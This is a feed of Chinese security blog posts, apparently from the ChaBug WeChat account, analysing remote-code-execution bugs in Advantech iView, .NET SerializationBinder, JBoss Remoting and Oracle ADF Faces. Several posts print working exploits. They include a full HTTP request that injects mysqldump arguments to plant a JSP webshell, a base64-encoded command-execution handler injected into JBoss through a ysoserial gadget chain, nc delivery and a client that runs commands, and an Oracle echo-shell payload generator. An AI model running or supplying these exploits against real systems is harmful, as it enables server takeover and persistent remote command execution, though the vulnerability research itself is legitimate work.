ChaBug

招人，老板不差钱，速度来一起办公

Fri, 21 Mar 2025 21:15:00 +0800

2025-03-21 21:15 河南

阅读原文

跳转微信打开

CVE-2022-2143 Advantech iView NetworkServlet 命令注入RCE

Wed, 06 Jul 2022 14:54:00 +0800

原创 ChaBug 2022-07-06 14:54 新加坡

调用关系查询MATCH (n:Class{NAME:'javax.servlet.http.HttpServ

调用关系查询

MATCH (n:Class{NAME:'javax.servlet.http.HttpServlet'})-[:EXTEND]-(c:Class)-[:HAS]->(m:Method)-[:CALL*2]-(m1:Method{NAME:'exec',CLASS_NAME:'java.lang.Runtime'}) return *

分析

com.imc.iview.network.NetworkServlet#doPost

两次校验

com.imc.iview.utils.CUtils#checkFileNameIncludePath(java.lang.String)

image.png

检验\webapps\防止写shell

com.imc.iview.utils.CUtils#checkSQLInjection检测了一些关键字。

public boolean checkSQLInjection(String model0) {    boolean result = false;    String model = model0.toLowerCase();    if (!model.contains(" or ") && !model.contains("'or ") && !model.contains("||") && !model.contains("==") && !model.contains("--")) {        if (model.contains("union") && model.contains("select")) {            if (this.checkCommentStr(model, "union", "select")) {                result = true;            }        } else if (model.contains("case") && model.contains("when")) {            if (this.checkCommentStr(model, "case", "when")) {                result = true;            }        } else if (model.contains("into") && model.contains("dumpfile")) {            if (this.checkCommentStr(model, "into", "dumpfile")) {                result = true;            }        } else if (model.contains("into") && model.contains("outfile")) {            if (this.checkCommentStr(model, "into", "outfile")) {                result = true;            }        } else if (model.contains(" where ") && model.contains("select ")) {            result = true;        } else if (model.contains("benchmark")) {            result = true;        } else if (model.contains("select") && model.contains("from")) {            if (this.checkCommentStr(model, "select", "from")) {                result = true;            }        } else if (model.contains("select/*")) {            result = true;        } else if (model.contains("delete") && model.contains("from")) {            if (this.checkCommentStr(model, "delete", "from")) {                result = true;            }        } else if (model.contains("drop") && model.contains("table") || model.contains("drop") && model.contains("database")) {            if (this.checkCommentStr(model, "drop", "table")) {                result = true;            }            if (this.checkCommentStr(model, "drop", "database")) {                result = true;            }        } else if (!model.contains("sleep(") && !model.contains(" rlike ") && !model.contains("rlike(") && !model.contains(" like ")) {            if (model.startsWith("'") && model.endsWith("#") && model.length() > 5) {                result = true;            } else if ((model.startsWith("9999'") || model.endsWith("#9999") || model.contains("#9999")) && model.length() > 10) {                result = true;            } else if (model.contains("getRuntime().exec") || model.contains("getruntime().exec") || model.contains("getRuntime()")) {                result = true;            }        } else {            result = true;        }    } else {        result = true;    }    if (result) {        System.out.println("Error: SQL Injection Vulnerability detected in [" + model0 + "]");    }    return result;}

那么mysqldump可以拼接-w参数将内容写入文件，然后可以多次传递-r参数覆盖原有的-r文件路径值

正常的命令为

"C:\Program Files (x86)\MySQL\MySQL Server 5.1\bin\mysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:\IMCTrapService\backup\aa"

命令注入构造payload

2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{99,109,100}))).start()).getInputStream()))%>"

POST /iView3/NetworkServlet HTTP/1.1Host: 172.16.16.132:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 79
page_action_type=backupDatabase&backup_filename=2.sql"+-r+"./webapps/iView3/test.jsp"+-w+"<%25%3dnew+String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new+ProcessBuilder(request.getParameter(new+java.lang.String(new+byte[]{99,109,100}))).start()).getInputStream()))%25>"

拼接之后为

"C:\Program Files (x86)\MySQL\MySQL Server 5.1\bin\mysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:\IMCTrapService\backup\2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{99,109,100}))).start()).getInputStream()))%>"

image.png

有php日志getshell的那味了。

修复

image.png

判断session登录状态

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

dotnet反序列化之并不安全的SerializationBinder

Tue, 05 Jul 2022 14:38:00 +0800

原创 ChaBug 2022-07-05 14:38 新加坡

今天看到了这篇文章[1]，记录一下。使用SerializationBinder先来一个demo，用Seria

今天看到了这篇文章^[1]，记录一下。

使用SerializationBinder

先来一个demo，用SerializationBinder限制一下反序列化的类型。

using System;using System.IO;using System.Runtime.Serialization;using System.Runtime.Serialization.Formatters.Binary;
namespace Serialize{    internal class Program    {        static void Main(string[] args)        {            BinaryFormatter binaryFormatter = new BinaryFormatter();            MemoryStream memoryStream = new MemoryStream();            RCE calc = new RCE("calc");            binaryFormatter.Serialize(memoryStream, calc);

            memoryStream.Position = 0;            binaryFormatter.Binder = new MyBinder();            object v = binaryFormatter.Deserialize(memoryStream);            Console.WriteLine(v);            Console.ReadKey();        }    }
    [Serializable]    class RCE    {        public string cmd;
        public RCE(string cmd)        {            this.cmd = cmd;        }
        public override string ToString()        {            return $"exec cmd:{cmd}";        }    }    class MyBinder : SerializationBinder    {        public override Type BindToType(string assemblyName, string typeName)        {            Console.WriteLine($"assemblyName:{assemblyName},typeName:{typeName}.");            Type typeToDeserialize = Type.GetType(String.Format("{0}, {1}", typeName, assemblyName));
            if (typeToDeserialize.Equals(typeof(RCE)))            {                //throw new Exception("can't deseriliza rce class.");                Console.WriteLine("can't deseriliza rce class.");                return null;            }            return typeToDeserialize;        }    }}

解释下代码，有一个RCE的类，通过反序列化cmd字段，然后触发他的tostring方法就可以rce执行命令。

在main函数中，我们先new了一个没有用binder的BinaryFormatter来序列化执行calc命令的RCE对象，在反序列化的时候，绑定了Binder实例做反序列化的类型判断。

在Binder中

image.png

通过Type.GetType拿到类型和typeof(RCE)进行比较，如果反序列化类型等于RCE，那么直接返回null，否则返回正确的type。

此时运行一下

image.png

发现Binder并没有起作用，calc命令仍然赋值给了RCE的cmd字段。why？

不起作用的Binder

dnspy调试断在binder的return上然后下一步发现

image.png

在调用完m_binder.BindToType(assemblyString, typeString)之后，如果type为空，dotnet会帮我们再次处理类型，也就是FastBindToType()

image.png

FastBindToType先从typecache中获取程序集，如果拿不到程序集就尝试进行加载程序集获取type。

其中bSimpleAssembly值取自FEassemblyFormat

image.png

而FEassemblyFormat是InternalFE的一个字段

image.png

通过 binaryFormatter.AssemblyFormat = System.Runtime.Serialization.Formatters.FormatterAssemblyStyle.Simple我们赋值bSimpleAssembly，如果不赋值默认值也为FormatterAssemblyStyle.Simple，所以bSimpleAssembly默认为true，接着看

image.png

通过 ObjectReader.ResolveSimpleAssemblyName 解析程序集，然后ObjectReader.GetSimplyNamedTypeFromAssembly(assembly, typeName, ref type)从程序集中拿type

在断点的地方已经拿到了RCE类的type

image.png

最终反序列化仍然拿到了RCE的type

image.png

而并没有受限于binder的类型绑定。

如何正确使用binder？

其实上文的demo中我已经给了修复的方法，当加载不允许的程序集type时应该直接抛出异常，而不是返回null。

image.png

在BlueHat中也提到过 https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization

image.png

CVE-2022-23277 of exchange

本地没有环境，直接用原作者的图了

image.png

exchange的binaryformatter都用到了ChainedSerializationBinder，上图是其实现。

在InternalBindToType返回空值时，不进行ValidateTypeToDeserialize导致黑名单完全不起作用。

InternalBindToType转发到LoadType函数

image.png

通过重写GetObjectData让序列化时自定义AssemblyName和FullTypeName

image.png

这样在LoadType的Type.GetType(string.Format("{0}, {1}",typeName,assemblyName))就会抛出异常

image.png

抛了异常但是被catch捕获之后相当于LoadType返回了null，那么接着ValidateTypeToDeserialize失效，从而交由FastBindToType获取type，绕过了binder。

总结

当binder返回null值时，binder对反序列化的类型校验不起作用。

References

[1] 这篇文章: https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

JBoss EAP/AS <= 6.* RCE及rpc回显

Fri, 01 Jul 2022 11:22:00 +0800

ChaBug 2022-07-01 11:22 四川

小贼看剑下次偷文章的时候麻烦先问下作者是否允许，我还以为作者投敌了呢！前言image.png这个洞是在国外A

小贼看剑

下次偷文章的时候麻烦先问下作者是否允许，我还以为作者投敌了呢！

前言

image.png

这个洞是在国外Alligator Conference 2019会议上的一个议题，ppt在这里 https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf

议题中讲到了jboss的4446端口反序列化rce，和一条jndi注入的gadget。

反序列化rce

jboss默认会开几个端口

端口	状态	目的
1098	启用	RMI 命名服务
3528	已禁用	IANA 分配的 IIOP 端口
4444	启用	RMI JRMP 调用程序
4445	启用	RMI 池调用程序
4446	启用	远程服务器连接器
4447	启用	远程服务器连接器
4457	启用	远程服务器连接器
4712	启用	JBossTS 恢复管理器
4713	启用	JBossTS 事务状态管理器
4714	启用	JBossTS 的进程 ID
8080	启用	HTTP 连接器
8083	启用	RMI 类加载迷你 Web 服务器
8443	启用	JBossWS HTTPS 连接器套接字

其中4445端口有一个历史RCE cve-2016-3690，是PooledInvokerServlet反序列化。

这次问题出在4446，这是个Remoting3端口，官网介绍看这里^[1]，看了看remoting3的文档没写，可以先看2的文档。

这是一个架构图

image.png

直接向4446发送一些数据

image.png

明显的aced0005，但是没有其他的东西了，可能是对数据的解析进行了特殊处理，我们使用api来远程调用一下。

创建一个maven项目，导入jboss remoting2的包，或者从 https://jbossremoting.jboss.org/downloads.html 直接下载jar包也行。

maven配置参考520师傅的

<dependency>    <groupId>org.jboss.remotinggroupId>    <artifactId>jboss-remotingartifactId>    <version>2.5.4.SP5version>dependency><dependency>    <groupId>org.jboss.logginggroupId>    <artifactId>jboss-loggingartifactId>    <version>3.3.0.Finalversion>dependency><dependency>    <groupId>org.jbossgroupId>    <artifactId>jboss-common-coreartifactId>    <version>2.5.0.Finalversion>    <exclusions>        <exclusion>            <groupId>org.jboss.logginggroupId>            <artifactId>jboss-logging-spiartifactId>        exclusion>    exclusions>dependency><dependency>    <groupId>concurrentgroupId>    <artifactId>concurrentartifactId>    <version>1.3.4version>dependency>

image.png

客户端先发一个0xaced0005，服务端回复一个0xaced0005，然后客户端发0x77011679...等。其中0x77011679分别表示

final static byte TC_BLOCKDATA =    (byte)0x77;final static byte SC_WRITE_METHOD = 0x01;0x16 Protocol version 22final static byte TC_RESET =        (byte)0x79;

image.png

后面的东西就是payload了，所以我们只需要替换yso生成的payload的前四个字节。

image.png

4446和3873端⼝均可利⽤。

调试跟一下

在org.jboss.remoting.transport.socket.ServerThread#processInvocation中处理了0x16，读出来协议版本为22

在org.jboss.remoting.transport.socket.ServerThread#versionedRead中会调用this.unmarshaller.read()

image.png

在read中调用java类型的原生反序列化org.jboss.remoting.serialization.impl.java.JavaSerializationManager#receiveObject

image.png

除了java以外还有别的

image.png

最后就进入了readObject

image.png

完整的堆栈

exec:348, Runtime (java.lang)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)transform:125, InvokerTransformer (org.apache.commons.collections.functors)transform:122, ChainedTransformer (org.apache.commons.collections.functors)get:151, LazyMap (org.apache.commons.collections.map)getValue:73, TiedMapEntry (org.apache.commons.collections.keyvalue)toString:131, TiedMapEntry (org.apache.commons.collections.keyvalue)readObject:86, BadAttributeValueExpException (javax.management)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)invokeReadObject:1185, ObjectStreamClass (java.io)readSerialData:2319, ObjectInputStream (java.io)readOrdinaryObject:2210, ObjectInputStream (java.io)readObject0:1690, ObjectInputStream (java.io)readObject:508, ObjectInputStream (java.io)readObject:466, ObjectInputStream (java.io)receiveObjectVersion2_2:238, JavaSerializationManager (org.jboss.remoting.serialization.impl.java)receiveObject:138, JavaSerializationManager (org.jboss.remoting.serialization.impl.java)read:123, SerializableUnMarshaller (org.jboss.remoting.marshal.serializable)versionedRead:900, ServerThread (org.jboss.remoting.transport.socket)completeInvocation:754, ServerThread (org.jboss.remoting.transport.socket)processInvocation:744, ServerThread (org.jboss.remoting.transport.socket)dorun:548, ServerThread (org.jboss.remoting.transport.socket)run:234, ServerThread (org.jboss.remoting.transport.socket)

rpc调用

研究了一下jboss的remoting，可以写一个类继承自ServerInvocationHandler接口，通过classloader定义到jvm中，然后client查询即可。

关于jboss remoting开发的可以直接看官方的sample，从这里下载^[2]

注册ServerInvocationHandler可以调用org.jboss.remoting.ServerInvoker#addInvocationHandler函数，我们需要在线程中找到ServerInvoker的值反射获取以此来动态添加handler。

调试来看在当前线程中就有handler所在的hashmap，所以我们只需要把我们的EvilHandler put进去就行了。

image.png

其中ASD就是我的handler

这里直接贴代码，首先需要一个JbossInvocationHandler来执行命令。

package ysoserial.payloads.templates;
import org.jboss.remoting.InvocationRequest;import org.jboss.remoting.ServerInvocationHandler;import org.jboss.remoting.ServerInvoker;import org.jboss.remoting.callback.InvokerCallbackHandler;
import javax.management.MBeanServer;
public class JbossInvocationHandler implements ServerInvocationHandler, Runnable {
    @Override    public void run() {    }
    @Override    public void setMBeanServer(MBeanServer mBeanServer) {    }
    @Override    public void setInvoker(ServerInvoker serverInvoker) {    }
    @Override    public Object invoke(InvocationRequest invocationRequest) throws Throwable {        String cmd = (String) invocationRequest.getParameter();        System.out.println("接收到命令：" + cmd);        String[] cmds = new String[]{"cmd", "/c", cmd};        if (!System.getProperty("os.name").toLowerCase().contains("win")) {            cmds = new String[]{"bash", "-c", cmd};        }        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmds).getInputStream(), "gbk").useDelimiter("\\A");        return s.hasNext() ? s.next() : "no result";    }
    @Override    public void addListener(InvokerCallbackHandler invokerCallbackHandler) {    }
    @Override    public void removeListener(InvokerCallbackHandler invokerCallbackHandler) {    }}

然后base64编码用classloader加载

package ysoserial.payloads.templates;
import org.jboss.remoting.ServerInvocationHandler;import org.jboss.remoting.transport.socket.ServerThread;import org.jboss.remoting.transport.socket.SocketServerInvoker;
import java.lang.reflect.Field;import java.lang.reflect.Method;import java.net.URL;import java.net.URLClassLoader;
public class Loader {    static {        try {            byte[] bytes = base64Decode("yv66vgAAADIAkAoAIABKCgBLAEwHAE0JAE4ATwcAUAoABQBKCABRCgAFAFIKAAUAUwoAVABVCAA3CABWCABXCgBOAFgKAAMAWQgAWgoAAwBbCABcCABdBwBeCgBfAGAKAF8AYQoAYgBjCABkCgAUAGUIAGYKABQAZwoAFABoCgAUAGkIAGoHAGsHAGwHAG0HAG4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEANUx5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL0pib3NzSW52b2NhdGlvbkhhbmRsZXI7AQADcnVuAQAOc2V0TUJlYW5TZXJ2ZXIBACEoTGphdmF4L21hbmFnZW1lbnQvTUJlYW5TZXJ2ZXI7KVYBAAttQmVhblNlcnZlcgEAHkxqYXZheC9tYW5hZ2VtZW50L01CZWFuU2VydmVyOwEACnNldEludm9rZXIBACUoTG9yZy9qYm9zcy9yZW1vdGluZy9TZXJ2ZXJJbnZva2VyOylWAQANc2VydmVySW52b2tlcgEAIkxvcmcvamJvc3MvcmVtb3RpbmcvU2VydmVySW52b2tlcjsBAAZpbnZva2UBADooTG9yZy9qYm9zcy9yZW1vdGluZy9JbnZvY2F0aW9uUmVxdWVzdDspTGphdmEvbGFuZy9PYmplY3Q7AQARaW52b2NhdGlvblJlcXVlc3QBACZMb3JnL2pib3NzL3JlbW90aW5nL0ludm9jYXRpb25SZXF1ZXN0OwEAA2NtZAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAA1TdGFja01hcFRhYmxlBwBNBwA6BwBeAQAKRXhjZXB0aW9ucwcAbwEAC2FkZExpc3RlbmVyAQA3KExvcmcvamJvc3MvcmVtb3RpbmcvY2FsbGJhY2svSW52b2tlckNhbGxiYWNrSGFuZGxlcjspVgEAFmludm9rZXJDYWxsYmFja0hhbmRsZXIBADRMb3JnL2pib3NzL3JlbW90aW5nL2NhbGxiYWNrL0ludm9rZXJDYWxsYmFja0hhbmRsZXI7AQAOcmVtb3ZlTGlzdGVuZXIBAApTb3VyY2VGaWxlAQAbSmJvc3NJbnZvY2F0aW9uSGFuZGxlci5qYXZhDAAjACQHAHAMAHEAcgEAEGphdmEvbGFuZy9TdHJpbmcHAHMMAHQAdQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAS5o6l5pS25Yiw5ZG95Luk77yaDAB2AHcMAHgAeQcAegwAewB8AQACL2MBAAdvcy5uYW1lDAB9AH4MAH8AeQEAA3dpbgwAgACBAQAEYmFzaAEAAi1jAQARamF2YS91dGlsL1NjYW5uZXIHAIIMAIMAhAwAhQCGBwCHDACIAIkBAANnYmsMACMAigEAAlxBDACLAIwMAI0AjgwAjwB5AQAJbm8gcmVzdWx0AQAzeXNvc2VyaWFsL3BheWxvYWRzL3RlbXBsYXRlcy9KYm9zc0ludm9jYXRpb25IYW5kbGVyAQAQamF2YS9sYW5nL09iamVjdAEAKm9yZy9qYm9zcy9yZW1vdGluZy9TZXJ2ZXJJbnZvY2F0aW9uSGFuZGxlcgEAEmphdmEvbGFuZy9SdW5uYWJsZQEAE2phdmEvbGFuZy9UaHJvd2FibGUBACRvcmcvamJvc3MvcmVtb3RpbmcvSW52b2NhdGlvblJlcXVlc3QBAAxnZXRQYXJhbWV0ZXIBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQALdG9Mb3dlckNhc2UBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACgoW0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAqKExqYXZhL2lvL0lucHV0U3RyZWFtO0xqYXZhL2xhbmcvU3RyaW5nOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leHQAIQAfACAAAgAhACIAAAAHAAEAIwAkAAEAJQAAAC8AAQABAAAABSq3AAGxAAAAAgAmAAAABgABAAAACgAnAAAADAABAAAABQAoACkAAAABACoAJAABACUAAAArAAAAAQAAAAGxAAAAAgAmAAAABgABAAAADgAnAAAADAABAAAAAQAoACkAAAABACsALAABACUAAAA1AAAAAgAAAAGxAAAAAgAmAAAABgABAAAAEgAnAAAAFgACAAAAAQAoACkAAAAAAAEALQAuAAEAAQAvADAAAQAlAAAANQAAAAIAAAABsQAAAAIAJgAAAAYAAQAAABYAJwAAABYAAgAAAAEAKAApAAAAAAABADEAMgABAAEAMwA0AAIAJQAAAQkABAAFAAAAhCu2AALAAANNsgAEuwAFWbcABhIHtgAILLYACLYACbYACga9AANZAxILU1kEEgxTWQUsU04SDbgADrYADxIQtgARmgAWBr0AA1kDEhJTWQQSE1NZBSxTTrsAFFm4ABUttgAWtgAXEhi3ABkSGrYAGzoEGQS2AByZAAsZBLYAHacABRIesAAAAAMAJgAAAB4ABwAAABoACAAbACEAHAA0AB0ARAAeAFcAIABxACEAJwAAADQABQAAAIQAKAApAAAAAACEADUANgABAAgAfAA3ADgAAgA0AFAAOQA6AAMAcQATADsAPAAEAD0AAAAVAAP9AFcHAD4HAD/8ACkHAEBBBwA+AEEAAAAEAAEAQgABAEMARAABACUAAAA1AAAAAgAAAAGxAAAAAgAmAAAABgABAAAAJgAnAAAAFgACAAAAAQAoACkAAAAAAAEARQBGAAEAAQBHAEQAAQAlAAAANQAAAAIAAAABsQAAAAIAJgAAAAYAAQAAACoAJwAAABYAAgAAAAEAKAApAAAAAAABAEUARgABAAEASAAAAAIASQ==");            ClassLoader classLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());            Method defineClass = classLoader.getClass().getSuperclass().getSuperclass().getDeclaredMethod("defineClass", byte[].class, int.class, int.class);            defineClass.setAccessible(true);            Class invoke = (Class) defineClass.invoke(classLoader, bytes, 0, bytes.length);            Object instance = invoke.newInstance();
            ServerThread serverThread = (ServerThread) Thread.currentThread();            Field invoker = serverThread.getClass().getDeclaredField("invoker");            invoker.setAccessible(true);            SocketServerInvoker invokeObj = (SocketServerInvoker) invoker.get(serverThread);            invokeObj.addInvocationHandler("Y4er", (ServerInvocationHandler) instance);        } catch (Throwable e) {            e.printStackTrace();        }    }
    public static byte[] base64Decode(String bs) throws Exception {        Class base64;        byte[] value = null;        try {            base64 = Class.forName("java.util.Base64");            Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);            value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs});        } catch (Exception e) {            try {                base64 = Class.forName("sun.misc.BASE64Decoder");                Object decoder = base64.newInstance();                value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs});            } catch (Exception e2) {            }        }        return value;    }}

最后用CB183生成payload。

package ysoserial;
import com.google.common.io.Files;import javassist.ClassPool;import javassist.CtClass;import org.apache.commons.codec.binary.Base64;import org.apache.commons.lang.ArrayUtils;import ysoserial.payloads.CommonsBeanutils183NOCC;import ysoserial.payloads.templates.JbossInvocationHandler;
import java.io.File;import java.util.Arrays;
public class JbossRemoting {    public static void main(String[] args) throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass ctClass = pool.get(JbossInvocationHandler.class.getName());        String s = Base64.encodeBase64String(ctClass.toBytecode());        System.out.println(s);
        Object calc = new CommonsBeanutils183NOCC().getObject("CLASS:Loader");        byte[] serialize = Serializer.serialize(calc);
        byte[] aced = Arrays.copyOfRange(serialize, 0, 4);        byte[] range = Arrays.copyOfRange(serialize, 4, serialize.length);        byte[] bs = new byte[]{0x77, 0x01, 0x16, 0x79};        System.out.println(aced.length + range.length == serialize.length);        byte[] bytes = ArrayUtils.addAll(aced, bs);        bytes = ArrayUtils.addAll(bytes, range);        Files.write(bytes, new File("E:\\tools\\code\\ysoserial\\target\\payload.ser"));    }}

然后nc发送

cat payload.ser |nc 127.0.0.1 4446|hexdump -C

然后新建一个client去执行命令

package org.jboss.remoting.samples.myclient;
import org.jboss.remoting.Client;import org.jboss.remoting.InvokerLocator;
public class MyClient {    public static void main(String[] args) throws Throwable {        InvokerLocator locator = new InvokerLocator("socket://127.0.0.1:4446/");        Client client = new Client(locator);        client.setSubsystem("Y4er");        client.connect();        Object as = client.invoke("dir");        System.out.println(as);        client.disconnect();    }}

jboss日志中

image.png

jndi注入

org.jboss.ejb3.mdb.ProducerManagerImpl#readExternal 很直观

不详细展开了

思考

jboss的rpc有多种传输方式，其内置了几种反序列化方式，其他协议是否会有问题？

jboss的remoting挺有意思，看了官方sample，可以rmi、socket、http等多种方式调用，除了handler是否有其他的回显方式？

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

References

[1] 官网介绍看这里: https://jbossremoting.jboss.org/remoting-3
[2] 这里下载: http://www.jboss.org/file-access/default/members/jbossremoting/downloads/jboss-remoting-2_5_4_SP5.zip

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

Oracle ADF Faces 反序列化RCE

Wed, 29 Jun 2022 15:24:00 +0800

原创 ChaBug 2022-06-29 15:24 四川

环境搭建安装Oracle19c，安装的时候这里要选AL32UTF8image.png接下来会卡在42%，多等

环境搭建

安装Oracle19c，安装的时候这里要选AL32UTF8

image.png

接下来会卡在42%，多等一会就好了。

安装fmw_12.2.1.3.0_infrastructure.jar 下一步下一步就行

然后安装bi fmw_12.2.1.4.0_bi_windows64_Disk1 下一步下一步就行了

然后运行rcu.bat

image.png

创建完bi所用的数据库之后运行C:\Oracle\Middleware\Oracle_Home\bi\bin\config.cmd配置bi

image.png

然后就安装完成了。

image.png

分析

修改C:\Oracle\Middleware\Oracle_Home\user_projects\domains\bi\bin\setDomainEnv.cmd 338行

set local_debug=true

然后重启Oracle BI的服务，会在8453端口监听debug

在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\bi\servers\AdminServer\tmp_WL_user\em\fw8wi5\war\WEB-INF\web.xml中 em对应Oracle BI的http://172.16.16.132:9500/em/ 管理界面

image.png

web.xml中定义了几个映射关系

image.png

在org.apache.myfaces.trinidad.webapp.ResourceServlet#doGet中

image.png

根据request获取对应的ResourceLoader和resourcePath

image.png

_getResourceLoader维护了一个ConcurrentMap存放servletPath和loader的映射关系。

在oracle.adfinternal.view.resource.rich.RenderKitResourceLoader中向map中注册了对应关系

image.png

当路由为/em/afr/foo/remote/payload时，会由RemoteApplicationResourceLoader作为doGet中的loader，调用其oracle.adfinternal.view.resource.rich.RemoteApplicationResourceLoader#findResource函数

image.png

返回了一个自定义的协议remote和协议处理器RAStreamHandler

image.png

RAStreamHandler的openConnection返回一个RAURLConnection实例对象，在其构造函数中

调用_getPathBean

image.png

截取到第一个/然后进入oracle.adfinternal.view.rich.remote.resources.URLEncoderPathBean#getInstanceFromString

image.png

不断跟进之后就是readObject

image.png

说明我们可以通过/em/afr/foo/remote/{encode payload}/的形式来反序列化。

gadget可以用CVE-2020-14644，这里放payload。

回显执行命令

package com.tangosol.internal.util.invoke.lambda;import com.tangosol.internal.util.invoke.AbstractRemotable;public class LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A extends AbstractRemotable {    public LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A() {        try {            weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread) Thread.currentThread()).getCurrentWork();            java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");            field.setAccessible(true);            Object obj = field.get(adapter);            weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);            weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) obj.getClass().getMethod("getServletResponse").invoke(obj);            String cmd = req.getHeader("cmd");            if (cmd != null && !cmd.isEmpty()) {                Process exec;                if (System.getProperty("os.name").toLowerCase().contains("win")) {                    exec = Runtime.getRuntime().exec(new String[]{"cmd", "/c", cmd});                } else {                    exec = Runtime.getRuntime().exec(new String[]{"sh", "-c", cmd});                }                res.getServletOutputStream().clearBuffer();                res.getServletOutputStream().writeStream(exec.getInputStream());                res.getServletOutputStream().flush();                res.getServletOutputStream().close();                res.flushBuffer();            }        } catch (Exception var1) {            var1.printStackTrace();        }    }}

生成payload

package com.example.miracle;import com.tangosol.internal.util.invoke.ClassDefinition;import com.tangosol.internal.util.invoke.ClassIdentity;import com.tangosol.internal.util.invoke.RemoteConstructor;import com.tangosol.internal.util.invoke.lambda.LambdaIdentity;import oracle.adf.view.rich.util.SerializationUtils;import java.nio.file.Files;import java.nio.file.Paths;public class Main {    public static void main(String[] args) throws Exception {        RemoteConstructor remoteConstructor = new RemoteConstructor(                new ClassDefinition(new ClassIdentity(LambdaIdentity.class), Files.readAllBytes(Paths.get("E:\\tools\\code\\Miracle\\target\\classes\\com\\tangosol\\internal\\util\\invoke\\lambda\\LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A.class"))), new Object[]{}        );        String s = SerializationUtils.toURLEncodedString(remoteConstructor);        System.out.println(s);    }}

回显复现截图

http://172.16.16.132:9500/em/afr/foo/remote/

image.png

http://172.16.16.132:9502/bicomposer/afr/foo/remote/

image.png

10.3.6

peterjson和jang在10.3.6上用的是ReflectionExtractor包RemoteInvocation的套娃然后调用ShellSession.eval来rce，记录一下，不做深入了，就是几个cve的综合使用。

坑

打poc时需要注意回显类的类名需要和目标版本对的上才行，具体看kingkk师傅的《CVE-2020-14644分析与gadget的一些思考》^[1]

也就是在这个地方com.tangosol.internal.util.invoke.ClassIdentity#ClassIdentity(java.lang.Class)

image.png

References

[1] 《CVE-2020-14644分析与gadget的一些思考》: https://www.kingkk.com/2020/08/CVE-2020-14644%E5%88%86%E6%9E%90%E4%B8%8Egadget%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%9D%E8%80%83/

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

解决哥斯拉内存马pagecontext的问题

Sat, 16 Apr 2022 11:39:00 +0800

